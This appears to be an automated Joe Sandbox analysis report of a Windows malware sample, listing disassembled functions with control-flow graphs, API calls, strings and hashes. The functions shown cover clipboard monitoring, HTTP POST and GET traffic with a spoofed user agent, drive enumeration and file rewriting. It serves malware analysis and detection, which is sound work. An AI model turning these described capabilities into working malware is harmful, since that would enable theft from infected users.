                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 450 40aea0-40aeb7 call 40add0 453 40aeb9 450->453 454 40aebe-40aeda call 40aa20 strcmp 450->454 455 40b145-40b148 453->455 458 40aee1-40aefd call 40aa20 strstr 454->458 459 40aedc 454->459 462 40af40-40af5c call 40aa20 strstr 458->462 463 40aeff-40af1b call 40aa20 strstr 458->463 459->455 470 40af5e-40af7a call 40aa20 strstr 462->470 471 40af9f-40afbb call 40aa20 strstr 462->471 468 40af3b 463->468 469 40af1d-40af39 call 40aa20 strstr 463->469 468->455 469->462 469->468 478 40af9a 470->478 479 40af7c-40af98 call 40aa20 strstr 470->479 480 40afbd-40afd9 call 40aa20 strstr 471->480 481 40affe-40b014 EnterCriticalSection 471->481 478->455 479->471 479->478 492 40aff9 480->492 493 40afdb-40aff7 call 40aa20 strstr 480->493 482 40b01f-40b028 481->482 485 40b059-40b064 call 40b150 482->485 486 40b02a-40b03a 482->486 499 40b13a-40b13f LeaveCriticalSection 485->499 500 40b06a-40b078 485->500 489 40b057 486->489 490 40b03c-40b055 call 40d4a0 486->490 489->482 490->485 492->455 493->481 493->492 499->455 502 40b07a 500->502 503 40b07e-40b08f call 409d90 500->503 502->503 503->499 506 40b095-40b0b2 call 40d4a0 503->506 509 40b0b4-40b0c4 506->509 510 40b10a-40b122 506->510 511 40b0d0-40b108 call 40a1b0 509->511 512 40b0c6-40b0ce Sleep 509->512 513 40b128-40b133 call 40b150 510->513 511->513 512->509 513->499 518 40b135 call 40ab80 513->518 518->499
                                                                    APIs
                                                                      • Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                      • Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                    • strcmp.NTDLL ref: 0040AED0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                    • API String ID: 2906596889-2213908610
                                                                    • Opcode ID: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                    • Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
                                                                    • Opcode Fuzzy Hash: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                    • Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E
                                                                    Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 520 401920-401947 GetTickCount WaitForSingleObject 521 401ac9-401acf 520->521 522 40194d-401964 WSAWaitForMultipleEvents 520->522 523 4019f0-401a03 GetTickCount 522->523 524 40196a-401981 WSAEnumNetworkEvents 522->524 525 401a43-401a4c GetTickCount 523->525 526 401a05-401a14 EnterCriticalSection 523->526 524->523 527 401983-401988 524->527 528 401ab5-401ac3 WaitForSingleObject 525->528 529 401a4e-401a5d EnterCriticalSection 525->529 530 401a16-401a1d 526->530 531 401a3a-401a41 LeaveCriticalSection 526->531 527->523 532 40198a-401990 527->532 528->521 528->522 533 401aa1-401ab1 LeaveCriticalSection GetTickCount 529->533 534 401a5f-401a77 InterlockedExchangeAdd call 40d4a0 529->534 535 401a35 call 401820 530->535 536 401a1f-401a27 530->536 531->528 532->523 537 401992-4019b1 accept 532->537 533->528 545 401a97-401a9f 534->545 546 401a79-401a82 534->546 535->531 536->530 539 401a29-401a30 LeaveCriticalSection 536->539 537->523 541 4019b3-4019c2 call 4022c0 537->541 539->528 541->523 547 4019c4-4019df call 401740 541->547 545->533 545->534 546->545 548 401a84-401a8d call 40ab40 546->548 547->523 553 4019e1-4019e7 547->553 548->545 553->523 554 4019e9-4019eb call 401cf0 553->554 554->523
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                    • String ID: PCOI$ilci
                                                                    • API String ID: 3345448188-3762367603
                                                                    • Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                    • Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
                                                                    • Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                    • Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99
                                                                    Function 0040E4F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.NTDLL ref: 0040E518
                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
                                                                    • HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E701
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E70E
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E71B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                    • API String ID: 2761394606-2217117414
                                                                    • Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                    • Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
                                                                    • Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                    • Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54
                                                                    Function 00401600 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 96networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                    • String ID: PCOI$ilci$.Mw
                                                                    • API String ID: 2403999931-2607080227
                                                                    • Opcode ID: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                    • Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
                                                                    • Opcode Fuzzy Hash: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                    • Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98
                                                                    Function 00405970 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 611 405970-405992 GetWindowLongW 612 405994-40599b 611->612 613 4059b6-4059bd 611->613 616 4059a1-4059a5 612->616 617 405a27-405a38 IsClipboardFormatAvailable 612->617 614 4059e6-4059ec 613->614 615 4059bf 613->615 619 405a06-405a0a 614->619 620 4059ee-405a04 SetWindowLongW 614->620 618 405ba4-405bbd DefWindowProcA 615->618 623 4059c4-4059e1 SetClipboardViewer SetWindowLongW 616->623 624 4059a7-4059ab 616->624 621 405a43-405a4d IsClipboardFormatAvailable 617->621 622 405a3a-405a41 617->622 625 405a22 619->625 626 405a0c-405a1c SendMessageA 619->626 620->625 628 405a58-405a62 IsClipboardFormatAvailable 621->628 629 405a4f-405a56 621->629 627 405a6b-405a6f 622->627 623->618 630 4059b1 624->630 631 405b5d-405b9e RegisterRawInputDevices ChangeClipboardChain 624->631 625->618 626->625 633 405a75-405a7f OpenClipboard 627->633 634 405b3f-405b43 627->634 628->627 632 405a64 628->632 629->627 630->618 631->618 632->627 633->634 637 405a85-405a96 GetClipboardData 633->637 635 405b45-405b55 SendMessageA 634->635 636 405b5b 634->636 635->636 636->618 638 405a98 637->638 639 405a9d-405aae GlobalLock 637->639 638->618 640 405ab0 639->640 641 405ab5-405ac6 639->641 640->618 642 405ac8-405acc 641->642 643 405ae9-405afc call 405690 641->643 644 405afe-405b0e call 4057b0 642->644 645 405ace-405ad2 642->645 651 405b11-405b25 GlobalUnlock CloseClipboard 643->651 644->651 647 405ad4 645->647 648 405ad6-405ae7 call 405570 645->648 647->651 648->651 651->634 654 405b27-405b3c call 404970 call 40a1b0 651->654 654->634
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040597C
                                                                    • SetClipboardViewer.USER32(?), ref: 004059C8
                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
                                                                    • OpenClipboard.USER32(00000000), ref: 00405A77
                                                                    • GetClipboardData.USER32(00000000), ref: 00405A89
                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405B9E
                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                    • String ID:
                                                                    • API String ID: 3549449529-0
                                                                    • Opcode ID: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                    • Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
                                                                    • Opcode Fuzzy Hash: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                    • Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69
                                                                    Function 00405880 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.NTDLL ref: 00405898
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
                                                                    • Sleep.KERNEL32(00000001), ref: 004058C4
                                                                    • GetTickCount.KERNEL32 ref: 004058CA
                                                                    • GetTickCount.KERNEL32 ref: 004058D3
                                                                    • wsprintfW.USER32 ref: 004058E6
                                                                    • RegisterClassExW.USER32(00000030), ref: 004058F3
                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
                                                                    • TranslateMessage.USER32(?), ref: 00405945
                                                                    • DispatchMessageA.USER32(?), ref: 0040594F
                                                                    • ExitThread.KERNEL32 ref: 00405961
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                    • String ID: %x%X$0
                                                                    • API String ID: 716646876-225668902
                                                                    • Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                    • Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
                                                                    • Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                    • Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68
                                                                    Function 0040DBC0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 669 40dbc0-40dc5b memset InternetCrackUrlA InternetOpenA 670 40dc61-40dc94 InternetConnectA 669->670 671 40ddd7-40dde0 669->671 672 40ddca-40ddd1 InternetCloseHandle 670->672 673 40dc9a-40dcca HttpOpenRequestA 670->673 672->671 674 40dcd0-40dce7 HttpSendRequestA 673->674 675 40ddbd-40ddc4 InternetCloseHandle 673->675 676 40ddb0-40ddb7 InternetCloseHandle 674->676 677 40dced-40dcf1 674->677 675->672 676->675 678 40dda6 677->678 679 40dcf7 677->679 678->676 680 40dd01-40dd08 679->680 681 40dd99-40dda4 680->681 682 40dd0e-40dd30 InternetReadFile 680->682 681->676 683 40dd32-40dd39 682->683 684 40dd3b 682->684 683->684 685 40dd3d-40dd94 call 409fe0 memcpy 683->685 684->681 685->680
                                                                    APIs
                                                                    • memset.NTDLL ref: 0040DBE8
                                                                    • InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDC4
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDD1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                    • String ID: <$GET
                                                                    • API String ID: 1205665004-427699995
                                                                    • Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                    • Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
                                                                    • Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                    • Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54
                                                                    Function 00406BC0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(000003E8), ref: 00406BCE
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00415E58,00000104), ref: 00406BE0
                                                                      • Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                      • Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                      • Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                    • ExitThread.KERNEL32 ref: 00406D4A
                                                                      • Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                      • Part of subcall function 004063A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                      • Part of subcall function 004063A0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                      • Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                    • Sleep.KERNEL32(00000BB8), ref: 00406D3D
                                                                      • Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
                                                                    • wsprintfW.USER32 ref: 00406CC2
                                                                    • wsprintfW.USER32 ref: 00406CE2
                                                                    • wsprintfW.USER32 ref: 00406D05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                    • API String ID: 1650488544-2117135753
                                                                    • Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                    • Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
                                                                    • Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                    • Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A
                                                                    Function 0040E7C0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 144fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 709 40e7c0-40e7ff CreateFileW 710 40e805-40e820 CreateFileMappingW 709->710 711 40e91a-40e91e 709->711 712 40e910-40e913 710->712 713 40e826-40e83f MapViewOfFile 710->713 714 40e920-40e940 CreateFileW 711->714 715 40e974-40e97a 711->715 712->711 716 40e845-40e85b GetFileSize 713->716 717 40e906-40e909 713->717 718 40e942-40e961 WriteFile 714->718 719 40e968-40e971 call 40a1b0 714->719 720 40e861-40e874 call 40c7f0 716->720 721 40e8fc-40e900 UnmapViewOfFile 716->721 717->712 718->719 719->715 720->721 726 40e87a-40e889 720->726 721->717 726->721 727 40e88b-40e8ba call 40c190 726->727 727->721 730 40e8bc-40e8e7 call 40a4e0 memcmp 727->730 730->721 733 40e8e9-40e8f5 call 40a1b0 730->733 733->721
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
                                                                    • memcmp.NTDLL ref: 0040E8DD
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E90A
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E914
                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E962
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                    • String ID: .Mw
                                                                    • API String ID: 3902698870-2453323595
                                                                    • Opcode ID: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                    • Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
                                                                    • Opcode Fuzzy Hash: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                    • Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58
                                                                    Function 0040B2C0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
                                                                    • CreateFileW.KERNEL32(00416478,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B3E2
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B3EC
                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
